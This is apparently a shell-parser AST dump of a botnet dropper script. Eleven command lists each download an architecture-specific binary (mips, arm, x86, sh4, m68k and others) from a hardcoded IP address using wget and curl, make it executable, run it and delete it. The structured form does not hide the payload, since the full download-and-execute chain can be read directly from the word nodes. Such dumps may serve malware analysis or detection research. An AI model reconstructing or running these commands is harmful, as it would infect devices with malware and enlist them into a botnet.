ListNode(lineno=2, pos=(12, 189), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 100), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 100), word='http://89.46.67.96/fyfa.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(100, 101)),
  CommandNode(lineno=2, pos=(102, 138), parts=[
    WordNode(lineno=2, pos=(102, 106), word='curl'),
    WordNode(lineno=2, pos=(107, 109), word='-O'),
    WordNode(lineno=2, pos=(110, 138), word='http://89.46.67.96/fyfa.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(138, 139)),
  CommandNode(lineno=2, pos=(140, 158), parts=[
    WordNode(lineno=2, pos=(140, 145), word='chmod'),
    WordNode(lineno=2, pos=(146, 148), word='+x'),
    WordNode(lineno=2, pos=(149, 158), word='fyfa.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(158, 159)),
  CommandNode(lineno=2, pos=(160, 171), parts=[
    WordNode(lineno=2, pos=(160, 171), word='./fyfa.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(171, 172)),
  CommandNode(lineno=2, pos=(173, 189), parts=[
    WordNode(lineno=2, pos=(173, 175), word='rm'),
    WordNode(lineno=2, pos=(176, 179), word='-rf'),
    WordNode(lineno=2, pos=(180, 189), word='fyfa.mips'),
  ]),
])
ListNode(lineno=3, pos=(190, 367), parts=[
  CommandNode(lineno=3, pos=(190, 197), parts=[
    WordNode(lineno=3, pos=(190, 192), word='cd'),
    WordNode(lineno=3, pos=(193, 197), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(198, 200)),
  CommandNode(lineno=3, pos=(201, 212), parts=[
    WordNode(lineno=3, pos=(201, 203), word='cd'),
    WordNode(lineno=3, pos=(204, 212), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(213, 215)),
  CommandNode(lineno=3, pos=(216, 223), parts=[
    WordNode(lineno=3, pos=(216, 218), word='cd'),
    WordNode(lineno=3, pos=(219, 223), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(224, 226)),
  CommandNode(lineno=3, pos=(227, 235), parts=[
    WordNode(lineno=3, pos=(227, 229), word='cd'),
    WordNode(lineno=3, pos=(230, 235), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(236, 238)),
  CommandNode(lineno=3, pos=(239, 243), parts=[
    WordNode(lineno=3, pos=(239, 241), word='cd'),
    WordNode(lineno=3, pos=(242, 243), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(243, 244)),
  CommandNode(lineno=3, pos=(245, 278), parts=[
    WordNode(lineno=3, pos=(245, 249), word='wget'),
    WordNode(lineno=3, pos=(250, 278), word='http://89.46.67.96/fyfa.mpsl'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(278, 279)),
  CommandNode(lineno=3, pos=(280, 316), parts=[
    WordNode(lineno=3, pos=(280, 284), word='curl'),
    WordNode(lineno=3, pos=(285, 287), word='-O'),
    WordNode(lineno=3, pos=(288, 316), word='http://89.46.67.96/fyfa.mpsl'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(316, 317)),
  CommandNode(lineno=3, pos=(318, 336), parts=[
    WordNode(lineno=3, pos=(318, 323), word='chmod'),
    WordNode(lineno=3, pos=(324, 326), word='+x'),
    WordNode(lineno=3, pos=(327, 336), word='fyfa.mpsl'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(336, 337)),
  CommandNode(lineno=3, pos=(338, 349), parts=[
    WordNode(lineno=3, pos=(338, 349), word='./fyfa.mpsl'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(349, 350)),
  CommandNode(lineno=3, pos=(351, 367), parts=[
    WordNode(lineno=3, pos=(351, 353), word='rm'),
    WordNode(lineno=3, pos=(354, 357), word='-rf'),
    WordNode(lineno=3, pos=(358, 367), word='fyfa.mpsl'),
  ]),
])
ListNode(lineno=4, pos=(368, 540), parts=[
  CommandNode(lineno=4, pos=(368, 375), parts=[
    WordNode(lineno=4, pos=(368, 370), word='cd'),
    WordNode(lineno=4, pos=(371, 375), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(376, 378)),
  CommandNode(lineno=4, pos=(379, 390), parts=[
    WordNode(lineno=4, pos=(379, 381), word='cd'),
    WordNode(lineno=4, pos=(382, 390), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(391, 393)),
  CommandNode(lineno=4, pos=(394, 401), parts=[
    WordNode(lineno=4, pos=(394, 396), word='cd'),
    WordNode(lineno=4, pos=(397, 401), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(402, 404)),
  CommandNode(lineno=4, pos=(405, 413), parts=[
    WordNode(lineno=4, pos=(405, 407), word='cd'),
    WordNode(lineno=4, pos=(408, 413), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(414, 416)),
  CommandNode(lineno=4, pos=(417, 421), parts=[
    WordNode(lineno=4, pos=(417, 419), word='cd'),
    WordNode(lineno=4, pos=(420, 421), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(421, 422)),
  CommandNode(lineno=4, pos=(423, 455), parts=[
    WordNode(lineno=4, pos=(423, 427), word='wget'),
    WordNode(lineno=4, pos=(428, 455), word='http://89.46.67.96/fyfa.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(455, 456)),
  CommandNode(lineno=4, pos=(457, 492), parts=[
    WordNode(lineno=4, pos=(457, 461), word='curl'),
    WordNode(lineno=4, pos=(462, 464), word='-O'),
    WordNode(lineno=4, pos=(465, 492), word='http://89.46.67.96/fyfa.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(492, 493)),
  CommandNode(lineno=4, pos=(494, 511), parts=[
    WordNode(lineno=4, pos=(494, 499), word='chmod'),
    WordNode(lineno=4, pos=(500, 502), word='+x'),
    WordNode(lineno=4, pos=(503, 511), word='fyfa.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(511, 512)),
  CommandNode(lineno=4, pos=(513, 523), parts=[
    WordNode(lineno=4, pos=(513, 523), word='./fyfa.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(523, 524)),
  CommandNode(lineno=4, pos=(525, 540), parts=[
    WordNode(lineno=4, pos=(525, 527), word='rm'),
    WordNode(lineno=4, pos=(528, 531), word='-rf'),
    WordNode(lineno=4, pos=(532, 540), word='fyfa.sh4'),
  ]),
])
ListNode(lineno=5, pos=(541, 713), parts=[
  CommandNode(lineno=5, pos=(541, 548), parts=[
    WordNode(lineno=5, pos=(541, 543), word='cd'),
    WordNode(lineno=5, pos=(544, 548), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(549, 551)),
  CommandNode(lineno=5, pos=(552, 563), parts=[
    WordNode(lineno=5, pos=(552, 554), word='cd'),
    WordNode(lineno=5, pos=(555, 563), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(564, 566)),
  CommandNode(lineno=5, pos=(567, 574), parts=[
    WordNode(lineno=5, pos=(567, 569), word='cd'),
    WordNode(lineno=5, pos=(570, 574), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(575, 577)),
  CommandNode(lineno=5, pos=(578, 586), parts=[
    WordNode(lineno=5, pos=(578, 580), word='cd'),
    WordNode(lineno=5, pos=(581, 586), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(587, 589)),
  CommandNode(lineno=5, pos=(590, 594), parts=[
    WordNode(lineno=5, pos=(590, 592), word='cd'),
    WordNode(lineno=5, pos=(593, 594), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(594, 595)),
  CommandNode(lineno=5, pos=(596, 628), parts=[
    WordNode(lineno=5, pos=(596, 600), word='wget'),
    WordNode(lineno=5, pos=(601, 628), word='http://89.46.67.96/fyfa.x86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(628, 629)),
  CommandNode(lineno=5, pos=(630, 665), parts=[
    WordNode(lineno=5, pos=(630, 634), word='curl'),
    WordNode(lineno=5, pos=(635, 637), word='-O'),
    WordNode(lineno=5, pos=(638, 665), word='http://89.46.67.96/fyfa.x86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(665, 666)),
  CommandNode(lineno=5, pos=(667, 684), parts=[
    WordNode(lineno=5, pos=(667, 672), word='chmod'),
    WordNode(lineno=5, pos=(673, 675), word='+x'),
    WordNode(lineno=5, pos=(676, 684), word='fyfa.x86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(684, 685)),
  CommandNode(lineno=5, pos=(686, 696), parts=[
    WordNode(lineno=5, pos=(686, 696), word='./fyfa.x86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(696, 697)),
  CommandNode(lineno=5, pos=(698, 713), parts=[
    WordNode(lineno=5, pos=(698, 700), word='rm'),
    WordNode(lineno=5, pos=(701, 704), word='-rf'),
    WordNode(lineno=5, pos=(705, 713), word='fyfa.x86'),
  ]),
])
ListNode(lineno=6, pos=(714, 886), parts=[
  CommandNode(lineno=6, pos=(714, 721), parts=[
    WordNode(lineno=6, pos=(714, 716), word='cd'),
    WordNode(lineno=6, pos=(717, 721), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(722, 724)),
  CommandNode(lineno=6, pos=(725, 736), parts=[
    WordNode(lineno=6, pos=(725, 727), word='cd'),
    WordNode(lineno=6, pos=(728, 736), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(737, 739)),
  CommandNode(lineno=6, pos=(740, 747), parts=[
    WordNode(lineno=6, pos=(740, 742), word='cd'),
    WordNode(lineno=6, pos=(743, 747), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(748, 750)),
  CommandNode(lineno=6, pos=(751, 759), parts=[
    WordNode(lineno=6, pos=(751, 753), word='cd'),
    WordNode(lineno=6, pos=(754, 759), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(760, 762)),
  CommandNode(lineno=6, pos=(763, 767), parts=[
    WordNode(lineno=6, pos=(763, 765), word='cd'),
    WordNode(lineno=6, pos=(766, 767), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(767, 768)),
  CommandNode(lineno=6, pos=(769, 801), parts=[
    WordNode(lineno=6, pos=(769, 773), word='wget'),
    WordNode(lineno=6, pos=(774, 801), word='http://89.46.67.96/fyfa.arm'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(801, 802)),
  CommandNode(lineno=6, pos=(803, 838), parts=[
    WordNode(lineno=6, pos=(803, 807), word='curl'),
    WordNode(lineno=6, pos=(808, 810), word='-O'),
    WordNode(lineno=6, pos=(811, 838), word='http://89.46.67.96/fyfa.arm'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(838, 839)),
  CommandNode(lineno=6, pos=(840, 857), parts=[
    WordNode(lineno=6, pos=(840, 845), word='chmod'),
    WordNode(lineno=6, pos=(846, 848), word='+x'),
    WordNode(lineno=6, pos=(849, 857), word='fyfa.arm'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(857, 858)),
  CommandNode(lineno=6, pos=(859, 869), parts=[
    WordNode(lineno=6, pos=(859, 869), word='./fyfa.arm'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(869, 870)),
  CommandNode(lineno=6, pos=(871, 886), parts=[
    WordNode(lineno=6, pos=(871, 873), word='rm'),
    WordNode(lineno=6, pos=(874, 877), word='-rf'),
    WordNode(lineno=6, pos=(878, 886), word='fyfa.arm'),
  ]),
])
ListNode(lineno=7, pos=(887, 1064), parts=[
  CommandNode(lineno=7, pos=(887, 894), parts=[
    WordNode(lineno=7, pos=(887, 889), word='cd'),
    WordNode(lineno=7, pos=(890, 894), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(895, 897)),
  CommandNode(lineno=7, pos=(898, 909), parts=[
    WordNode(lineno=7, pos=(898, 900), word='cd'),
    WordNode(lineno=7, pos=(901, 909), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(910, 912)),
  CommandNode(lineno=7, pos=(913, 920), parts=[
    WordNode(lineno=7, pos=(913, 915), word='cd'),
    WordNode(lineno=7, pos=(916, 920), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(921, 923)),
  CommandNode(lineno=7, pos=(924, 932), parts=[
    WordNode(lineno=7, pos=(924, 926), word='cd'),
    WordNode(lineno=7, pos=(927, 932), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(933, 935)),
  CommandNode(lineno=7, pos=(936, 940), parts=[
    WordNode(lineno=7, pos=(936, 938), word='cd'),
    WordNode(lineno=7, pos=(939, 940), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(940, 941)),
  CommandNode(lineno=7, pos=(942, 975), parts=[
    WordNode(lineno=7, pos=(942, 946), word='wget'),
    WordNode(lineno=7, pos=(947, 975), word='http://89.46.67.96/fyfa.i686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(975, 976)),
  CommandNode(lineno=7, pos=(977, 1013), parts=[
    WordNode(lineno=7, pos=(977, 981), word='curl'),
    WordNode(lineno=7, pos=(982, 984), word='-O'),
    WordNode(lineno=7, pos=(985, 1013), word='http://89.46.67.96/fyfa.i686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1013, 1014)),
  CommandNode(lineno=7, pos=(1015, 1033), parts=[
    WordNode(lineno=7, pos=(1015, 1020), word='chmod'),
    WordNode(lineno=7, pos=(1021, 1023), word='+x'),
    WordNode(lineno=7, pos=(1024, 1033), word='fyfa.i686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1033, 1034)),
  CommandNode(lineno=7, pos=(1035, 1046), parts=[
    WordNode(lineno=7, pos=(1035, 1046), word='./fyfa.i686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1046, 1047)),
  CommandNode(lineno=7, pos=(1048, 1064), parts=[
    WordNode(lineno=7, pos=(1048, 1050), word='rm'),
    WordNode(lineno=7, pos=(1051, 1054), word='-rf'),
    WordNode(lineno=7, pos=(1055, 1064), word='fyfa.i686'),
  ]),
])
ListNode(lineno=8, pos=(1065, 1237), parts=[
  CommandNode(lineno=8, pos=(1065, 1072), parts=[
    WordNode(lineno=8, pos=(1065, 1067), word='cd'),
    WordNode(lineno=8, pos=(1068, 1072), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1073, 1075)),
  CommandNode(lineno=8, pos=(1076, 1087), parts=[
    WordNode(lineno=8, pos=(1076, 1078), word='cd'),
    WordNode(lineno=8, pos=(1079, 1087), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1088, 1090)),
  CommandNode(lineno=8, pos=(1091, 1098), parts=[
    WordNode(lineno=8, pos=(1091, 1093), word='cd'),
    WordNode(lineno=8, pos=(1094, 1098), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1099, 1101)),
  CommandNode(lineno=8, pos=(1102, 1110), parts=[
    WordNode(lineno=8, pos=(1102, 1104), word='cd'),
    WordNode(lineno=8, pos=(1105, 1110), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1111, 1113)),
  CommandNode(lineno=8, pos=(1114, 1118), parts=[
    WordNode(lineno=8, pos=(1114, 1116), word='cd'),
    WordNode(lineno=8, pos=(1117, 1118), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1118, 1119)),
  CommandNode(lineno=8, pos=(1120, 1152), parts=[
    WordNode(lineno=8, pos=(1120, 1124), word='wget'),
    WordNode(lineno=8, pos=(1125, 1152), word='http://89.46.67.96/fyfa.pcc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1152, 1153)),
  CommandNode(lineno=8, pos=(1154, 1189), parts=[
    WordNode(lineno=8, pos=(1154, 1158), word='curl'),
    WordNode(lineno=8, pos=(1159, 1161), word='-O'),
    WordNode(lineno=8, pos=(1162, 1189), word='http://89.46.67.96/fyfa.pcc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1189, 1190)),
  CommandNode(lineno=8, pos=(1191, 1208), parts=[
    WordNode(lineno=8, pos=(1191, 1196), word='chmod'),
    WordNode(lineno=8, pos=(1197, 1199), word='+x'),
    WordNode(lineno=8, pos=(1200, 1208), word='fyfa.pcc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1208, 1209)),
  CommandNode(lineno=8, pos=(1210, 1220), parts=[
    WordNode(lineno=8, pos=(1210, 1220), word='./fyfa.pcc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1220, 1221)),
  CommandNode(lineno=8, pos=(1222, 1237), parts=[
    WordNode(lineno=8, pos=(1222, 1224), word='rm'),
    WordNode(lineno=8, pos=(1225, 1228), word='-rf'),
    WordNode(lineno=8, pos=(1229, 1237), word='fyfa.pcc'),
  ]),
])
ListNode(lineno=9, pos=(1238, 1415), parts=[
  CommandNode(lineno=9, pos=(1238, 1245), parts=[
    WordNode(lineno=9, pos=(1238, 1240), word='cd'),
    WordNode(lineno=9, pos=(1241, 1245), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1246, 1248)),
  CommandNode(lineno=9, pos=(1249, 1260), parts=[
    WordNode(lineno=9, pos=(1249, 1251), word='cd'),
    WordNode(lineno=9, pos=(1252, 1260), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1261, 1263)),
  CommandNode(lineno=9, pos=(1264, 1271), parts=[
    WordNode(lineno=9, pos=(1264, 1266), word='cd'),
    WordNode(lineno=9, pos=(1267, 1271), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1272, 1274)),
  CommandNode(lineno=9, pos=(1275, 1283), parts=[
    WordNode(lineno=9, pos=(1275, 1277), word='cd'),
    WordNode(lineno=9, pos=(1278, 1283), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1284, 1286)),
  CommandNode(lineno=9, pos=(1287, 1291), parts=[
    WordNode(lineno=9, pos=(1287, 1289), word='cd'),
    WordNode(lineno=9, pos=(1290, 1291), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1291, 1292)),
  CommandNode(lineno=9, pos=(1293, 1326), parts=[
    WordNode(lineno=9, pos=(1293, 1297), word='wget'),
    WordNode(lineno=9, pos=(1298, 1326), word='http://89.46.67.96/fyfa.i586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1326, 1327)),
  CommandNode(lineno=9, pos=(1328, 1364), parts=[
    WordNode(lineno=9, pos=(1328, 1332), word='curl'),
    WordNode(lineno=9, pos=(1333, 1335), word='-O'),
    WordNode(lineno=9, pos=(1336, 1364), word='http://89.46.67.96/fyfa.i586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1364, 1365)),
  CommandNode(lineno=9, pos=(1366, 1384), parts=[
    WordNode(lineno=9, pos=(1366, 1371), word='chmod'),
    WordNode(lineno=9, pos=(1372, 1374), word='+x'),
    WordNode(lineno=9, pos=(1375, 1384), word='fyfa.i586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1384, 1385)),
  CommandNode(lineno=9, pos=(1386, 1397), parts=[
    WordNode(lineno=9, pos=(1386, 1397), word='./fyfa.i586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1397, 1398)),
  CommandNode(lineno=9, pos=(1399, 1415), parts=[
    WordNode(lineno=9, pos=(1399, 1401), word='rm'),
    WordNode(lineno=9, pos=(1402, 1405), word='-rf'),
    WordNode(lineno=9, pos=(1406, 1415), word='fyfa.i586'),
  ]),
])
ListNode(lineno=10, pos=(1416, 1593), parts=[
  CommandNode(lineno=10, pos=(1416, 1423), parts=[
    WordNode(lineno=10, pos=(1416, 1418), word='cd'),
    WordNode(lineno=10, pos=(1419, 1423), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1424, 1426)),
  CommandNode(lineno=10, pos=(1427, 1438), parts=[
    WordNode(lineno=10, pos=(1427, 1429), word='cd'),
    WordNode(lineno=10, pos=(1430, 1438), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1439, 1441)),
  CommandNode(lineno=10, pos=(1442, 1449), parts=[
    WordNode(lineno=10, pos=(1442, 1444), word='cd'),
    WordNode(lineno=10, pos=(1445, 1449), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1450, 1452)),
  CommandNode(lineno=10, pos=(1453, 1461), parts=[
    WordNode(lineno=10, pos=(1453, 1455), word='cd'),
    WordNode(lineno=10, pos=(1456, 1461), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1462, 1464)),
  CommandNode(lineno=10, pos=(1465, 1469), parts=[
    WordNode(lineno=10, pos=(1465, 1467), word='cd'),
    WordNode(lineno=10, pos=(1468, 1469), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1469, 1470)),
  CommandNode(lineno=10, pos=(1471, 1504), parts=[
    WordNode(lineno=10, pos=(1471, 1475), word='wget'),
    WordNode(lineno=10, pos=(1476, 1504), word='http://89.46.67.96/fyfa.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1504, 1505)),
  CommandNode(lineno=10, pos=(1506, 1542), parts=[
    WordNode(lineno=10, pos=(1506, 1510), word='curl'),
    WordNode(lineno=10, pos=(1511, 1513), word='-O'),
    WordNode(lineno=10, pos=(1514, 1542), word='http://89.46.67.96/fyfa.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1542, 1543)),
  CommandNode(lineno=10, pos=(1544, 1562), parts=[
    WordNode(lineno=10, pos=(1544, 1549), word='chmod'),
    WordNode(lineno=10, pos=(1550, 1552), word='+x'),
    WordNode(lineno=10, pos=(1553, 1562), word='fyfa.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1562, 1563)),
  CommandNode(lineno=10, pos=(1564, 1575), parts=[
    WordNode(lineno=10, pos=(1564, 1575), word='./fyfa.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1575, 1576)),
  CommandNode(lineno=10, pos=(1577, 1593), parts=[
    WordNode(lineno=10, pos=(1577, 1579), word='rm'),
    WordNode(lineno=10, pos=(1580, 1583), word='-rf'),
    WordNode(lineno=10, pos=(1584, 1593), word='fyfa.m68k'),
  ]),
])
ListNode(lineno=11, pos=(1594, 1766), parts=[
  CommandNode(lineno=11, pos=(1594, 1601), parts=[
    WordNode(lineno=11, pos=(1594, 1596), word='cd'),
    WordNode(lineno=11, pos=(1597, 1601), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1602, 1604)),
  CommandNode(lineno=11, pos=(1605, 1616), parts=[
    WordNode(lineno=11, pos=(1605, 1607), word='cd'),
    WordNode(lineno=11, pos=(1608, 1616), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1617, 1619)),
  CommandNode(lineno=11, pos=(1620, 1627), parts=[
    WordNode(lineno=11, pos=(1620, 1622), word='cd'),
    WordNode(lineno=11, pos=(1623, 1627), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1628, 1630)),
  CommandNode(lineno=11, pos=(1631, 1639), parts=[
    WordNode(lineno=11, pos=(1631, 1633), word='cd'),
    WordNode(lineno=11, pos=(1634, 1639), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1640, 1642)),
  CommandNode(lineno=11, pos=(1643, 1647), parts=[
    WordNode(lineno=11, pos=(1643, 1645), word='cd'),
    WordNode(lineno=11, pos=(1646, 1647), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1647, 1648)),
  CommandNode(lineno=11, pos=(1649, 1681), parts=[
    WordNode(lineno=11, pos=(1649, 1653), word='wget'),
    WordNode(lineno=11, pos=(1654, 1681), word='http://89.46.67.96/fyfa.spc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1681, 1682)),
  CommandNode(lineno=11, pos=(1683, 1718), parts=[
    WordNode(lineno=11, pos=(1683, 1687), word='curl'),
    WordNode(lineno=11, pos=(1688, 1690), word='-O'),
    WordNode(lineno=11, pos=(1691, 1718), word='http://89.46.67.96/fyfa.spc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1718, 1719)),
  CommandNode(lineno=11, pos=(1720, 1737), parts=[
    WordNode(lineno=11, pos=(1720, 1725), word='chmod'),
    WordNode(lineno=11, pos=(1726, 1728), word='+x'),
    WordNode(lineno=11, pos=(1729, 1737), word='fyfa.spc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1737, 1738)),
  CommandNode(lineno=11, pos=(1739, 1749), parts=[
    WordNode(lineno=11, pos=(1739, 1749), word='./fyfa.spc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1749, 1750)),
  CommandNode(lineno=11, pos=(1751, 1766), parts=[
    WordNode(lineno=11, pos=(1751, 1753), word='rm'),
    WordNode(lineno=11, pos=(1754, 1757), word='-rf'),
    WordNode(lineno=11, pos=(1758, 1766), word='fyfa.spc'),
  ]),
])
ListNode(lineno=12, pos=(1767, 1939), parts=[
  CommandNode(lineno=12, pos=(1767, 1774), parts=[
    WordNode(lineno=12, pos=(1767, 1769), word='cd'),
    WordNode(lineno=12, pos=(1770, 1774), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1775, 1777)),
  CommandNode(lineno=12, pos=(1778, 1789), parts=[
    WordNode(lineno=12, pos=(1778, 1780), word='cd'),
    WordNode(lineno=12, pos=(1781, 1789), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1790, 1792)),
  CommandNode(lineno=12, pos=(1793, 1800), parts=[
    WordNode(lineno=12, pos=(1793, 1795), word='cd'),
    WordNode(lineno=12, pos=(1796, 1800), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1801, 1803)),
  CommandNode(lineno=12, pos=(1804, 1812), parts=[
    WordNode(lineno=12, pos=(1804, 1806), word='cd'),
    WordNode(lineno=12, pos=(1807, 1812), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1813, 1815)),
  CommandNode(lineno=12, pos=(1816, 1820), parts=[
    WordNode(lineno=12, pos=(1816, 1818), word='cd'),
    WordNode(lineno=12, pos=(1819, 1820), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1820, 1821)),
  CommandNode(lineno=12, pos=(1822, 1854), parts=[
    WordNode(lineno=12, pos=(1822, 1826), word='wget'),
    WordNode(lineno=12, pos=(1827, 1854), word='http://89.46.67.96/fyfa.pcc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1854, 1855)),
  CommandNode(lineno=12, pos=(1856, 1891), parts=[
    WordNode(lineno=12, pos=(1856, 1860), word='curl'),
    WordNode(lineno=12, pos=(1861, 1863), word='-O'),
    WordNode(lineno=12, pos=(1864, 1891), word='http://89.46.67.96/fyfa.pcc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1891, 1892)),
  CommandNode(lineno=12, pos=(1893, 1910), parts=[
    WordNode(lineno=12, pos=(1893, 1898), word='chmod'),
    WordNode(lineno=12, pos=(1899, 1901), word='+x'),
    WordNode(lineno=12, pos=(1902, 1910), word='fyfa.pcc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1910, 1911)),
  CommandNode(lineno=12, pos=(1912, 1922), parts=[
    WordNode(lineno=12, pos=(1912, 1922), word='./fyfa.pcc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1922, 1923)),
  CommandNode(lineno=12, pos=(1924, 1939), parts=[
    WordNode(lineno=12, pos=(1924, 1926), word='rm'),
    WordNode(lineno=12, pos=(1927, 1930), word='-rf'),
    WordNode(lineno=12, pos=(1931, 1939), word='fyfa.pcc'),
  ]),
])
